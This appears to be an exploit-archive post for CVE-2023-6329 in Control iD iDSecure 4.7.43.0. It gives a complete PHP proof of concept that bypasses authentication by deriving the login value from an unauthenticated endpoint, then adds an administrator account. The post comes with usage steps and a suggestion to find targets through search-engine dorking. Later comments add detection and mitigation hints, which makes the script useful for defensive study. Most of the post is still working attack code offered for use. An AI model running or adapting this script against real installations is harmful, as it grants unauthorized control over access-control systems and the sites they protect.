Control iD iDSecure 4.7.43.0 Add Administrator / Authentication Bypass
Control iD iDSecure 4.7.43.0 Add Administrator / Authentication Bypass
=============================================================================================================================================
| # Title : Control iD iDSecure v4.7.43.0 Add Administrator / Authentication Bypass (PoC written in PHP) |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://profil.nunukankab.go.id/org/dkisp |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

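[+] Code Description: The code exploits an authentication bypass in Control iD iDSecure to add a new administrative user without knowing any existing password. It derives the login value from data that an unauthenticated endpoint returns, logs in with it, and uses the resulting access token to create the operator.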

( https://packetstorm.news/files/id/180858/ CVE-2023-6329)

[+] save code as poc.php.

[+] Set Target : the $target_host variable near the end of the script (line 114 of the original listing)

[+] Usage : php poc.php

[+] PayLoad :

<?php

/**
 * Proof of concept for the issue this page references as CVE-2023-6329.
 *
 * The class issues three HTTP requests against the configured base URL:
 *   1. GET  /api/login/unlockGetData  (no Authorization header)
 *   2. POST /api/login/               (passwordCustom + passwordRandom)
 *   3. POST /api/operator/            (Bearer token from step 2)
 *
 * Root cause as shown by this code: every input to the login value in step 2 is either
 * returned by step 1 or a constant in the script, so no secret is needed to compute it.
 *
 * Defender view: in web/API logs this appears as the three requests above from one client
 * in quick succession, followed by a new operator record. Mitigation is the vendor fix for
 * the CVE cited on the page, plus limiting network reachability of the management API.
 */
class ControlIDExploit {
// Base URL of the iDSecure instance, stored without a trailing slash.
private $target;
// Login name (also used as display name) of the operator the script tries to create.
private $new_user;
// Password for that operator; printed in clear text on success.
private $new_password;

/**
 * Stores the base URL and the credentials of the operator to be created.
 *
 * @param string $target       Base URL, e.g. scheme + host; a trailing "/" is stripped.
 * @param string $new_user     Operator login/name sent in step 3.
 * @param string $new_password Operator password sent in step 3.
 */
public function __construct($target, $new_user, $new_password) {
$this->target = rtrim($target, '/'); // drop trailing "/" so target + uri has no double slash
$this->new_user = $new_user;
$this->new_password = $new_password;
}

/**
 * Sends one HTTP request with cURL and returns the JSON-decoded response.
 *
 * @param string     $method  HTTP verb passed to CURLOPT_CUSTOMREQUEST.
 * @param string     $uri     Path appended to the base URL.
 * @param array|null $data    If truthy, JSON-encoded as the request body.
 * @param array      $headers Extra header lines; Content-Type is appended when a body is sent.
 * @return mixed Decoded JSON as an associative array, or null when the body is not valid JSON.
 *
 * Terminates the script via die() on a cURL error or an HTTP 404; any other status
 * code falls through to decoding.
 */
private function send_request($method, $uri, $data = null, $headers = []) {
$url = "{$this->target}{$uri}";
$ch = curl_init($url);

curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// NOTE(review): certificate and hostname verification are both switched off, so the
// script accepts any TLS certificate and the connection is open to interception.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // overall timeout of 10 seconds

// A body is attached only when $data is truthy (null or an empty array sends none).
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_UNESCAPED_UNICODE));
$headers[] = 'Content-Type: application/json';
}

if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
die(" Error connecting to $url: $error\n");
}

if ($http_code == 404) {
die(" Unexpected response (404 - Not Found): Check the link is valid $url\n");
}

// Re-encode to UTF-8 (source encoding auto-detected) before decoding as an associative array.
return json_decode(mb_convert_encoding($response, 'UTF-8', 'auto'), true);
}

/**
 * Runs the full sequence: fetch unlock data, derive the login value, log in, create operator.
 *
 * Prints progress to stdout and terminates via die() as soon as a step does not return
 * the expected field. Returns nothing.
 */
public function exploit() {
echo " Trying to get the raw data...\n";

// 1) Fetch serial and passwordRandom; the request carries no Authorization header.
$response = $this->send_request('GET', '/api/login/unlockGetData');

if (!isset($response['passwordRandom']) || !isset($response['serial'])) {
die("? Failed to get raw data. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

$password_random = $response['passwordRandom'];
$serial = $response['serial'];

echo " Retrieved passwordRandom: $password_random\n";
echo " Retrieved serial: $serial\n";

// 2) Derive passwordCustom: sha256( sha1(serial) . passwordRandom . 'cid2016' ), keep the
//    first 6 hex characters and convert them to decimal (so the value is 0..16777215).
//    Both variable inputs came from step 1 and the suffix is a constant in this script,
//    presumably mirroring one in the product - confirm against the vendor advisory.
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = hexdec($short_hash);

echo " Created passwordCustom: $password_custom\n";

// 3) Log in with the derived value; the script expects an accessToken field back
//    (its own output labels it a JWT).
echo "Attempt to login...\n";
$login_data = [
'passwordCustom' => (string)$password_custom,
'passwordRandom' => $password_random
];

$response = $this->send_request('POST', '/api/login/', $login_data);
if (!isset($response['accessToken'])) {
die(" Login failed. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

$access_token = $response['accessToken'];
echo " Obtained JWT: $access_token\n";

// 4) Create the operator with the token from step 3.
//    NOTE(review): the meaning of idType '1' is not shown here; the page title implies
//    it is the administrator type - confirm.
echo " Trying to add a new user...\n";
$user_data = [
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
];

$headers = [
"Authorization: Bearer $access_token"
];

$response = $this->send_request('POST', '/api/operator/', $user_data, $headers);
// Success is judged by a 'code' field in the JSON body (loose comparison with 200),
// not by the HTTP status code.
if (!isset($response['code']) || $response['code'] != 200) {
die(" Failed to add new user. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

// The new credentials are written to stdout in clear text.
echo " User added successfully: {$this->new_user}:{$this->new_password}\n";
}
}

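// Driver: build the PoC object from the three values below and run it once.
// REVIEW: the published listing hard-coded a third-party production hostname here; it is
// replaced with a placeholder on the reserved ".example" TLD (stand-in for a lab instance).
$target_host = 'https://idsecure.lab.example'; // placeholder, not a real host
// REVIEW: these are fixed, publicly known values. An operator named 'adminuser' in an
// iDSecure operator list is therefore a cheap indicator to search for on exposed installs.
$new_admin_user = 'adminuser';
$new_admin_password = 'securepassword';

// Runs all steps; the class terminates the script via die() on the first failed step.
$exploit = new ControlIDExploit($target_host, $new_admin_user, $new_admin_password);
$exploit->exploit();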


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================